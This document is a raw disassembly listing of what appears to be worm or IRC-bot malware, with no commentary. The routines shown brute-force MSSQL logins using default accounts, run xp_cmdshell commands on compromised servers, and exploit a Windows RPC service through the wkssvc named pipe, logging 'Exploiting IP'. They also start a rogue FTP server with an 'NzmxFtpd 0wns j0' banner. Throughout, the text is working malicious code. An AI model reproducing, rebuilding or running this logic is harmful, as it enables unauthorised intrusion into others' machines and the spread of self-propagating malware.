loc_40483F: ; CODE XREF: sub_404737+63�j
; sub_404737+79�j ...
xor eax, eax
jmp loc_40490C
; ---------------------------------------------------------------------------
loc_404846: ; CODE XREF: sub_404737+106�j
push edi
jmp short loc_40486D
; ---------------------------------------------------------------------------
loc_404849: ; CODE XREF: sub_404737+103�j
push 2
push ebx
sub esp, 0BCh
lea esi, [ebp+arg_0]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_4042F8
add esp, 0C4h
test al, al
jnz short loc_40488D
push 1
loc_40486D: ; CODE XREF: sub_404737+110�j
push ebx
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_4042F8
add esp, 0C4h
test al, al
jz short loc_404894
loc_40488D: ; CODE XREF: sub_404737+132�j
mov [ebp+var_4], 1
loc_404894: ; CODE XREF: sub_404737+154�j
push ebx
call dword_441450 ; closesocket
cmp [ebp+var_4], 0
jz short loc_404909
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_A8]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
push offset unk_426B40
lea eax, [ebp+var_214]
push 200h
push eax
call sub_41792A
push 0
lea eax, [ebp+var_214]
push [ebp+arg_B0]
push eax
lea eax, [ebp+arg_14]
push eax
push [ebp+arg_0]
call sub_40DC10
lea eax, [ebp+var_214]
push eax
call sub_40C4F7
mov eax, [ebp+arg_A8]
add esp, 2Ch
imul eax, 3Ch
inc dword_428C00[eax]
lea eax, dword_428C00[eax]
loc_404909: ; CODE XREF: sub_404737+168�j
push 1
pop eax
loc_40490C: ; CODE XREF: sub_404737+10A�j
pop edi
pop esi
pop ebx
leave
retn
sub_404737 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
sub esp, 0BCh
lea esi, [ebp+8]
mov dword ptr [ebp+0A8h], 1BDh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40381E
push 2Fh
lea esi, [ebp+8]
pop ecx
mov dword ptr [ebp+0A8h], 1BDh
mov edi, esp
mov [ebp-4], eax
rep movsd
call sub_404737
add esp, 0BCh
cmp dword ptr [ebp-4], 0
jnz short loc_404962
test eax, eax
jz short loc_404965
loc_404962: ; CODE XREF: ___:0040495C�j
push 1
pop eax
loc_404965: ; CODE XREF: ___:00404960�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404969 proc near ; CODE XREF: ___:00404C35�p
var_E34 = byte ptr -0E34h
var_A34 = byte ptr -0A34h
var_634 = byte ptr -634h
var_234 = byte ptr -234h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_22 = byte ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
arg_B4 = dword ptr 0BCh
push ebp
mov ebp, esp
sub esp, 0E34h
mov al, byte_43C63C
push ebx
mov [ebp+var_1], al
lea eax, [ebp+var_10]
push esi
xor ebx, ebx
push eax
mov esi, offset aSa ; "sa"
push ebx
push 1
mov [ebp+var_34], esi
mov [ebp+var_30], offset aRoot ; "root"
mov [ebp+var_2C], offset aAdmin ; "admin"
mov [ebp+var_28], ebx
mov [ebp+var_1C], ebx
mov [ebp+var_C], ebx
mov [ebp+var_8], ebx
call dword_44133C
test ax, ax
jnz short loc_4049C9
push 0FFFFFFFAh
push 3
push 0C8h
push [ebp+var_10]
call dword_441440
test ax, ax
jz short loc_4049D0
loc_4049C9: ; CODE XREF: sub_404969+47�j
xor eax, eax
jmp loc_404C11
; ---------------------------------------------------------------------------
loc_4049D0: ; CODE XREF: sub_404969+5E�j
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push 2
call dword_44133C
test ax, ax
jnz loc_404C04
test esi, esi
push edi
mov [ebp+var_18], ebx
jz loc_404BF5
mov edi, dword_421070
lea ecx, [ebp+var_34]
mov [ebp+var_20], ecx
loc_404A00: ; CODE XREF: sub_404969+1F4�j
cmp off_42EF40, ebx
mov [ebp+var_14], ebx
jz loc_404B49
mov ebx, [ecx]
mov eax, offset off_42EF40
mov esi, eax
loc_404A18: ; CODE XREF: sub_404969+123�j
lea ecx, [ebp+var_1]
push ecx
push dword ptr [eax]
lea eax, [ebp+arg_4]
push ebx
push [ebp+arg_A0]
push eax
lea eax, [ebp+var_A34]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
push eax
call sub_4173AC
add esp, 1Ch
lea eax, [ebp+var_22]
push 0
push eax
lea eax, [ebp+var_E34]
push 400h
push eax
lea eax, [ebp+var_A34]
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_A34]
push eax
push 0
push [ebp+var_C]
call dword_4413F4
test ax, ax
jz short loc_404A93
cmp ax, 1
jz short loc_404A93
push 1F4h
call edi ; Sleep
inc [ebp+var_14]
add esi, 4
mov eax, esi
cmp dword ptr [esi], 0
jnz short loc_404A18
jmp loc_404B47
; ---------------------------------------------------------------------------
loc_404A93: ; CODE XREF: sub_404969+109�j
; sub_404969+10F�j
lea eax, [ebp+var_8]
push eax
push [ebp+var_C]
push 3
call dword_44133C
mov esi, offset byte_42EDC4
push esi
push esi
call sub_417408
push eax
call sub_417408
push eax
push dword_43C64C
push [ebp+arg_0]
call sub_40AFAB
pop ecx
push eax
lea eax, [ebp+var_634]
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'del eq&echo o"...
push eax
call sub_4173AC
add esp, 20h
lea eax, [ebp+var_634]
push 0FFFFFFFDh
push eax
push [ebp+var_8]
call dword_44137C
test ax, ax
jz short loc_404B3C
mov ebx, 1388h
push ebx
call edi ; Sleep
push esi
lea eax, [ebp+var_634]
push offset aExecMaster___0 ; "EXEC master..xp_cmdshell '%s'"
push eax
call sub_4173AC
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_234]
push offset unk_426BB0
push eax
call sub_4173AC
add esp, 18h
lea eax, [ebp+var_634]
push 0FFFFFFFDh
push eax
push [ebp+var_8]
call dword_44137C
test ax, ax
jz short loc_404B62
push ebx
call edi ; Sleep
loc_404B3C: ; CODE XREF: sub_404969+185�j
push [ebp+var_8]
push 3
call dword_4413D4
loc_404B47: ; CODE XREF: sub_404969+125�j
xor ebx, ebx
loc_404B49: ; CODE XREF: sub_404969+A0�j
mov ecx, [ebp+var_20]
inc [ebp+var_18]
add ecx, 4
mov [ebp+var_20], ecx
cmp [ecx], ebx
jz loc_404BF5
jmp loc_404A00
; ---------------------------------------------------------------------------
loc_404B62: ; CODE XREF: sub_404969+1CE�j
mov eax, [ebp+var_14]
mov [ebp+var_1C], 1
push off_42EF40[eax*4]
mov eax, [ebp+var_18]
push [ebp+eax*4+var_34]
lea eax, [ebp+arg_4]
push [ebp+arg_A0]
push eax
mov eax, [ebp+arg_A8]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
push offset unk_426B6C
lea eax, [ebp+var_234]
push 200h
push eax
call sub_41792A
add esp, 20h
cmp [ebp+arg_B4], 0
jnz short loc_404BD3
push 0
lea eax, [ebp+var_234]
push [ebp+arg_B0]
push eax
lea eax, [ebp+arg_14]
push eax
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_404BD3: ; CODE XREF: sub_404969+24A�j
lea eax, [ebp+var_234]
push eax
call sub_40C4F7
mov eax, [ebp+arg_A8]
pop ecx
imul eax, 3Ch
inc dword_428C00[eax]
lea eax, dword_428C00[eax]
loc_404BF5: ; CODE XREF: sub_404969+85�j
; sub_404969+1EE�j
push [ebp+var_C]
push 2
call dword_4413D4
mov ebx, [ebp+var_1C]
pop edi
loc_404C04: ; CODE XREF: sub_404969+79�j
push [ebp+var_10]
push 1
call dword_4413D4
mov eax, ebx
loc_404C11: ; CODE XREF: sub_404969+62�j
pop esi
pop ebx
leave
retn
sub_404969 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
sub esp, 0BCh
lea esi, [ebp+8]
mov dword ptr [ebp+0A8h], 599h
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_404969
push 2Fh
lea esi, [ebp+8]
pop ecx
mov dword ptr [ebp+0A8h], 1BDh
mov edi, esp
mov [ebp-4], eax
rep movsd
call sub_404737
add esp, 0BCh
mov [ebp+0C0h], eax
push 1
pop eax
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_404C69 proc near ; CODE XREF: sub_404D78+F4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
xor esi, esi
cmp [esp+4+arg_4], esi
jbe short loc_404C98
mov edx, [esp+4+arg_8]
loc_404C76: ; CODE XREF: sub_404C69+2D�j
mov eax, [esp+4+arg_0]
mov cl, [esi+eax]
mov al, cl
and cl, 0Fh
shr al, 4
add cl, 41h
add al, 41h
mov [edx], cl
mov [edx+1], al
inc esi
inc edx
inc edx
cmp esi, [esp+4+arg_4]
jb short loc_404C76
loc_404C98: ; CODE XREF: sub_404C69+7�j
pop esi
retn
sub_404C69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C9A proc near ; CODE XREF: sub_404C9A+CD�p
; sub_404D78+48B�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_404CAE
or [ebp+arg_7], 1
jmp short loc_404CB2
; ---------------------------------------------------------------------------
loc_404CAE: ; CODE XREF: sub_404C9A+C�j
and [ebp+arg_7], 0FEh
loc_404CB2: ; CODE XREF: sub_404C9A+12�j
mov ebx, [ebp+arg_20]
mov eax, [ebp+arg_24]
lea ecx, [ebx+18h]
cmp ecx, eax
ja short loc_404CD3
or [ebp+arg_7], 2
and [ebp+arg_2B], 0
lea eax, [ebx+18h]
mov [ebp+arg_14], ebx
mov [ebp+arg_C], ax
jmp short loc_404CE5
; ---------------------------------------------------------------------------
loc_404CD3: ; CODE XREF: sub_404C9A+23�j
mov [ebp+arg_C], ax
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_14], eax
mov [ebp+arg_2B], 1
loc_404CE5: ; CODE XREF: sub_404C9A+37�j
movzx eax, [ebp+arg_C]
push eax
mov [ebp+var_4], eax
call sub_417BEE
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jnz short loc_404CFE
loc_404CFA: ; CODE XREF: sub_404C9A+A4�j
xor al, al
jmp short loc_404D73
; ---------------------------------------------------------------------------
loc_404CFE: ; CODE XREF: sub_404C9A+5E�j
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_417490
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
nop
call near ptr 7C810D87h
push [ebp+arg_20]
test eax, eax
jnz short loc_404D40
call sub_417C62
pop ecx
jmp short loc_404CFA
; ---------------------------------------------------------------------------
loc_404D40: ; CODE XREF: sub_404C9A+9C�j
call sub_417C62
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_404D71
push 0
sub ebx, edi
push [ebp+arg_24]
add edi, esi
lea esi, [ebp+arg_4]
push ebx
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
rep movsd
call sub_404C9A
add esp, 2Ch
jmp short loc_404D73
; ---------------------------------------------------------------------------
loc_404D71: ; CODE XREF: sub_404C9A+B0�j
mov al, 1
loc_404D73: ; CODE XREF: sub_404C9A+62�j
; sub_404C9A+D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_404C9A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D78 proc near ; CODE XREF: ___:004052D2�p
; ___:004052EC�p ...
var_D198 = byte ptr -0D198h
var_9198 = byte ptr -9198h
var_7198 = byte ptr -7198h
var_5198 = byte ptr -5198h
var_3198 = byte ptr -3198h
var_1640 = dword ptr -1640h
var_D44 = byte ptr -0D44h
var_D3F = byte ptr -0D3Fh
var_D00 = byte ptr -0D00h
var_894 = byte ptr -894h
var_694 = byte ptr -694h
var_290 = byte ptr -290h
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_70 = byte ptr -70h
var_6C = byte ptr -6Ch
var_6B = byte ptr -6Bh
var_6A = byte ptr -6Ah
var_69 = byte ptr -69h
var_68 = dword ptr -68h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = dword ptr -60h
var_5C = word ptr -5Ch
var_5A = word ptr -5Ah
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = word ptr -50h
var_4E = byte ptr -4Eh
var_4C = byte ptr -4Ch
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = dword ptr -20h
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_18 = byte ptr 20h
arg_AC = dword ptr 0B4h
arg_B4 = dword ptr 0BCh
push ebp
mov ebp, esp
mov eax, 0D198h
call sub_417B70
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp+arg_8]
push ebx
push eax
call sub_40DA5C
pop ecx
cmp eax, 3
pop ecx
jnz loc_40522C
push offset byte_42EDC4
push [ebp+arg_4]
call sub_40AFAB
pop ecx
push eax
lea eax, [ebp+var_894]
push 200h
push eax
call sub_416CC9
xor edi, edi
add esp, 10h
cmp eax, edi
mov [ebp+var_8], eax
jz loc_40522C
push 401h
lea eax, [ebp+var_694]
push edi
push eax
call sub_417430
push 0DACh
lea eax, [ebp+var_1640]
push edi
push eax
call sub_417430
push 1B58h
lea eax, [ebp+var_3198]
push edi
push eax
call sub_417430
push 0DABh
lea eax, [ebp+var_1640]
push 41h
push eax
call sub_417430
mov esi, [ebp+arg_0]
push 5
shl esi, 4
push offset dword_426E40
mov eax, dword ptr (loc_426E9E+2)[esi]
mov ecx, dword ptr (loc_426E97+5)[esi]
mov [ebp+eax+var_1640], ecx
lea eax, [ebp+var_D44]
push eax
call sub_417490
push 3Fh
lea eax, [ebp+var_D3F]
push offset sub_426E58
push eax
call sub_417490
add esp, 48h
lea eax, [ebp+var_694]
push eax
lea eax, [ebp+var_894]
push [ebp+var_8]
push eax
call sub_404C69
lea eax, [ebp+var_694]
push eax
call sub_417AF0
push eax
lea eax, [ebp+var_694]
push eax
lea eax, [ebp+var_D00]
push eax
call sub_417490
lea eax, [ebp+var_694]
push eax
call sub_417AF0
and [ebp+eax+var_D00], 0
add esp, 20h
xor ecx, ecx
lea eax, [ebp+var_3198]
loc_404EB0: ; CODE XREF: sub_404D78+14D�j
movzx dx, byte ptr [ebp+ecx+var_1640]
mov [eax], dx
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jb short loc_404EB0
lea eax, [ebp+arg_8]
push eax
push offset aS_1 ; "\\\\%s"
lea eax, [ebp+var_9198]
push 2000h
push eax
call sub_41792A
lea eax, [ebp+var_9198]
push 2000h
push eax
lea eax, [ebp+var_D198]
push eax
call sub_417CAE
lea eax, [ebp+arg_8]
push offset a_ ; "."
push eax
call sub_4203F0
add esp, 24h
test eax, eax
jz short loc_404F58
lea eax, [ebp+arg_8]
push eax
push offset loc_425AEC
lea eax, [ebp+var_5198]
push 2000h
push eax
call sub_41792A
push 20h
lea eax, [ebp+var_90]
push edi
push eax
call sub_417430
lea eax, [ebp+var_5198]
add esp, 1Ch
mov [ebp+var_7C], eax
mov eax, offset byte_43C63C
push edi
push eax
push eax
lea eax, [ebp+var_90]
push eax
call dword_441460
loc_404F58: ; CODE XREF: sub_404D78+194�j
lea eax, [ebp+arg_8]
push eax
push offset aSPipeWkssvc ; "\\\\%s\\pipe\\wkssvc"
lea eax, [ebp+var_7198]
push 2000h
push eax
call sub_41792A
add esp, 10h
lea eax, [ebp+var_7198]
push edi
push edi
push 3
push edi
push 3
push 40000000h
push eax
nop
call near ptr 7C801A24h
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_404F9D
loc_404F96: ; CODE XREF: sub_404D78+31B�j
push edi
push edi
jmp loc_405223
; ---------------------------------------------------------------------------
loc_404F9D: ; CODE XREF: sub_404D78+21C�j
push 48h
lea eax, [ebp+var_6C]
push edi
push eax
call sub_417430
and [ebp+var_6B], 0
push 10h
pop eax
mov [ebp+var_6C], 5
mov [ebp+var_68], eax
push eax
lea eax, [ebp+var_4C]
push offset dword_428004
push eax
mov [ebp+var_6A], 0Bh
mov [ebp+var_69], 3
mov [ebp+var_64], 48h
mov [ebp+var_62], di
mov [ebp+var_60], ebx
mov [ebp+var_5C], 10B8h
mov [ebp+var_5A], 10B8h
mov [ebp+var_58], edi
mov [ebp+var_54], ebx
mov [ebp+var_50], di
mov [ebp+var_4E], 1
mov [ebp+var_3C], ebx
call sub_417490
push 10h
lea eax, [ebp+var_38]
push offset dword_427FF0
push eax
mov [ebp+var_28], 2
call sub_417490
add esp, 24h
lea eax, [ebp+var_70]
push edi
push eax
lea eax, [ebp+var_6C]
push 48h
push eax
push [ebp+var_4]
nop
call near ptr 7C810D87h
test eax, eax
jz short loc_40508A
lea eax, [ebp+var_D198]
push eax
call sub_417C91
pop ecx
lea ebx, [eax+eax+12h]
loc_40503B: ; CODE XREF: sub_404D78+2C9�j
test bl, 3
jz short loc_405043
inc ebx
jmp short loc_40503B
; ---------------------------------------------------------------------------
loc_405043: ; CODE XREF: sub_404D78+2C6�j
cmp byte ptr (loc_426EA3+1)[esi], 0
jz short loc_40504F
add ebx, 4
loc_40504F: ; CODE XREF: sub_404D78+2D2�j
lea eax, [ebp+var_3198]
push eax
call sub_417C91
pop ecx
lea eax, [ebx+eax*2+0Eh]
loc_405060: ; CODE XREF: sub_404D78+2ED�j
test al, 3
jz short loc_405067
inc eax
jmp short loc_405060
; ---------------------------------------------------------------------------
loc_405067: ; CODE XREF: sub_404D78+2EA�j
add eax, 8
cmp byte ptr (loc_426EA3+1)[esi], 0
jz short loc_405078
add eax, 4
jmp short loc_40507A
; ---------------------------------------------------------------------------
loc_405078: ; CODE XREF: sub_404D78+2F9�j
inc eax
inc eax
loc_40507A: ; CODE XREF: sub_404D78+2FE�j
push eax
mov [ebp+var_8], eax
call sub_417BEE
mov ebx, eax
pop ecx
cmp ebx, edi
jnz short loc_405098
loc_40508A: ; CODE XREF: sub_404D78+2B0�j
push [ebp+var_4]
nop
call near ptr 7C809B47h
jmp loc_404F96
; ---------------------------------------------------------------------------
loc_405098: ; CODE XREF: sub_404D78+310�j
push [ebp+var_8]
push edi
push ebx
call sub_417430
push 4
push offset dword_426E48
push ebx
call sub_417490
lea eax, [ebp+var_D198]
push eax
call sub_417C91
inc eax
mov [ebx+0Ch], eax
mov [ebx+8], edi
mov eax, [ebx+0Ch]
mov [ebx+4], eax
lea eax, [ebp+var_D198]
push eax
lea eax, [ebx+10h]
push eax
call sub_417BC9
lea eax, [ebp+var_D198]
push eax
call sub_417C91
lea eax, [eax+eax+12h]
add esp, 28h
test al, 3
mov [ebp+arg_0], eax
jz short loc_4050FA
loc_4050F2: ; CODE XREF: sub_404D78+37D�j
inc eax
test al, 3
jnz short loc_4050F2
mov [ebp+arg_0], eax
loc_4050FA: ; CODE XREF: sub_404D78+378�j
cmp byte ptr (loc_426EA3+1)[esi], 0
jz short loc_40511C
push 4
add eax, ebx
push offset dword_426E50
push eax
call sub_417490
add esp, 0Ch
add [ebp+arg_0], 4
mov eax, [ebp+arg_0]
loc_40511C: ; CODE XREF: sub_404D78+389�j
add eax, ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_3198]
push eax
call sub_417C91
mov ecx, eax
mov eax, [ebp+var_C]
inc ecx
add [ebp+arg_0], 0Ch
mov [eax+8], ecx
mov [eax+4], edi
mov ecx, [eax+8]
mov [eax], ecx
lea eax, [ebp+var_3198]
push eax
mov eax, [ebp+arg_0]
add eax, ebx
push eax
call sub_417BC9
lea eax, [ebp+var_3198]
push eax
call sub_417C91
mov ecx, [ebp+arg_0]
add esp, 10h
lea eax, [ecx+eax*2+2]
test al, 3
mov [ebp+arg_0], eax
jz short loc_405179
loc_405171: ; CODE XREF: sub_404D78+3FC�j
inc eax
test al, 3
jnz short loc_405171
mov [ebp+arg_0], eax
loc_405179: ; CODE XREF: sub_404D78+3F7�j
push 8
add eax, ebx
push edi
push eax
call sub_417430
mov eax, [ebp+arg_0]
add esp, 0Ch
add eax, 8
cmp byte ptr (loc_426EA3+1)[esi], 0
jz short loc_40519B
mov [eax+ebx], edi
jmp short loc_4051A1
; ---------------------------------------------------------------------------
loc_40519B: ; CODE XREF: sub_404D78+41C�j
mov word ptr [eax+ebx], 1
loc_4051A1: ; CODE XREF: sub_404D78+421�j
push 18h
lea eax, [ebp+var_24]
push edi
push eax
call sub_417430
add esp, 0Ch
mov cl, byte ptr (loc_426EA3+1)[esi]
and [ebp+var_23], 0
and [ebp+var_22], 0
push 1
mov [ebp+var_1A], di
pop eax
mov [ebp+var_10], di
push eax
push 10B8h
push [ebp+var_8]
lea esi, [ebp+var_24]
neg cl
sbb ecx, ecx
push ebx
and ecx, 2
sub esp, 18h
add ecx, 19h
mov [ebp+var_24], 5
push 6
mov [ebp+var_E], cx
pop ecx
mov [ebp+var_21], 3
mov edi, esp
push [ebp+var_4]
mov [ebp+var_20], 10h
mov [ebp+var_18], eax
rep movsd
call sub_404C9A
add esp, 2Ch
test al, al
push [ebp+var_4]
jnz short loc_405233
nop
call near ptr 7C809B47h
push ebx
call sub_417C62
pop ecx
push 0
push 0
loc_405223: ; CODE XREF: sub_404D78+220�j
push [ebp+var_7C]
call dword_441420
loc_40522C: ; CODE XREF: sub_404D78+22�j
; sub_404D78+52�j
xor eax, eax
jmp loc_4052B7
; ---------------------------------------------------------------------------
loc_405233: ; CODE XREF: sub_404D78+498�j
nop
call near ptr 7C809B47h
push ebx
call sub_417C62
pop ecx
xor esi, esi
push esi
push esi
push [ebp+var_7C]
call dword_441420
lea eax, [ebp+arg_8]
push eax
mov eax, [ebp+arg_AC]
imul eax, 3Ch
add eax, offset aDcom135 ; "Dcom135"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp+var_290]
push 200h
push eax
call sub_41792A
push esi
lea eax, [ebp+var_290]
push [ebp+arg_B4]
push eax
lea eax, [ebp+arg_18]
push eax
push [ebp+arg_4]
call sub_40DC10
lea eax, [ebp+var_290]
push eax
call sub_40C4F7
mov eax, [ebp+arg_AC]
add esp, 2Ch
imul eax, 3Ch
inc dword_428C00[eax]
push 1
lea eax, dword_428C00[eax]
pop eax
loc_4052B7: ; CODE XREF: sub_404D78+4B6�j
pop edi
pop esi
pop ebx
leave
retn
sub_404D78 endp
; ---------------------------------------------------------------------------
push ebx
push esi
push edi
lea esi, [esp+10h]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
push 1
rep movsd
call sub_404D78
add esp, 4
lea esi, [esp+0CCh]
mov ebx, eax
push 2Fh
pop ecx
mov edi, esp
push 1
rep movsd
call sub_404D78
add esp, 0C0h
test eax, eax
jnz short loc_4052FF
test ebx, ebx
jz short loc_405302
loc_4052FF: ; CODE XREF: ___:004052F9�j
push 1
pop eax
loc_405302: ; CODE XREF: ___:004052FD�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
push ebx
push esi
push edi
lea esi, [esp+10h]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
push 0
rep movsd
call sub_404D78
add esp, 4
lea esi, [esp+0CCh]
mov ebx, eax
push 2Fh
pop ecx
mov edi, esp
push 0
rep movsd
call sub_404D78
add esp, 0C0h
test eax, eax
jnz short loc_405349
test ebx, ebx
jz short loc_40534C
loc_405349: ; CODE XREF: ___:00405343�j
push 1
pop eax
loc_40534C: ; CODE XREF: ___:00405347�j
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405350 proc near ; DATA XREF: sub_4071BD+226�o
var_A6C = byte ptr -0A6Ch
var_8DC = byte ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
var_29C = byte ptr -29Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A6Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 1
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6DC]
pop ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+var_A6C]
xor edi, edi
push eax
push 101h
mov [ebp+var_28], ebx
mov [ebp+var_18], ebx
mov [ebp+var_228], edi
mov [ebp+var_438], edi
nop
call near ptr 71AB664Dh
push edi
call sub_418000
push eax
call sub_4173FE
push 0FEB0h
push 406h
call sub_415EF7
add esp, 10h
mov dword_43C64C, eax
push edi
push ebx
push 2
nop
call near ptr 71AB3B91h
mov esi, eax
lea eax, [ebp+var_28]
push 4
push eax
push 4
push 0FFFFh
push esi
mov [ebp+var_C], esi
nop
call near ptr 71AB3EA1h
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push esi
nop
call near ptr 71AB4519h
mov ax, word ptr dword_43C64C
mov [ebp+var_38], 2
push eax
mov [ebp+var_34], edi
nop
call near ptr 71AB2B66h
mov [ebp+var_36], ax
lea eax, [ebp+var_38]
push 10h
push eax
push esi
nop
call near ptr 71AB3E00h
test eax, eax
jge short loc_405425
mov eax, ebx
jmp loc_40594C
; ---------------------------------------------------------------------------
loc_405425: ; CODE XREF: sub_405350+CC�j
push 0Ah
push esi
nop
call near ptr 71AB88D3h
mov [ebp+var_228], ebx
mov ebx, dword_4211EC
mov [ebp+var_224], esi
mov [ebp+var_4], esi
loc_405443: ; CODE XREF: sub_405350+12C�j
; sub_405350+5F4�j
push 41h
lea esi, [ebp+var_228]
pop ecx
lea edi, [ebp+var_438]
rep movsd
xor esi, esi
lea eax, [ebp+var_438]
push esi
push esi
push esi
push eax
mov eax, [ebp+var_4]
inc eax
push eax
nop
call near ptr 71AB2DC0h
cmp eax, 0FFFFFFFFh
jz loc_405949
xor edi, edi
cmp [ebp+var_4], esi
mov [ebp+arg_0], edi
jl short loc_405443
loc_40547E: ; CODE XREF: sub_405350+5EE�j
xor esi, esi
push 64h
lea eax, [ebp+var_29C]
push esi
push eax
call sub_417430
push 64h
lea eax, [ebp+var_AC]
push esi
push eax
call sub_417430
add esp, 18h
lea eax, [ebp+var_438]
push eax
push edi
call sub_4203D0
; ---------------------------------------------------------------------------
dw 0C085h
dd 481840Fh, 7D3B0000h, 8D7A75F4h, 45C7DC45h, 10DCh, 858D5000h
dd 0FFFFFDC8h, 0F475FF50h, 0BB52E890h, 0F883716Bh, 58840FFFh
dd 33000004h, 0D8B539C9h, 76FFFFFDh, 0DC958D16h
db 0FDh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_4054EF: ; CODE XREF: sub_405350+1AD�j
cmp [edx], eax
jz short loc_4054FF
inc ecx
add edx, 4
cmp ecx, [ebp+var_228]
jb short loc_4054EF
loc_4054FF: ; CODE XREF: sub_405350+1A1�j
cmp ecx, [ebp+var_228]
jnz short loc_40551D
cmp [ebp+var_228], 40h
jnb short loc_40551D
mov [ebp+ecx*4+var_224], eax
inc [ebp+var_228]
loc_40551D: ; CODE XREF: sub_405350+1B5�j
; sub_405350+1BE�j
cmp eax, [ebp+var_4]
jle short loc_405525
mov [ebp+var_4], eax
loc_405525: ; CODE XREF: sub_405350+1D0�j
push esi
push 15h
push offset a220Nzmxftpd0wn ; "220 NzmxFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_405937
; ---------------------------------------------------------------------------
db 56h, 8Dh, 85h
dd 0FFFFFD64h, 5750646Ah, 0C14E890h, 0C085716Bh, 958B527Fh
dd 0FFFFFDD8h, 0D63BC933h, 858D3A76h, 0FFFFFDDCh
; ---------------------------------------------------------------------------
loc_40555C: ; CODE XREF: sub_405350+216�j
cmp [eax], edi
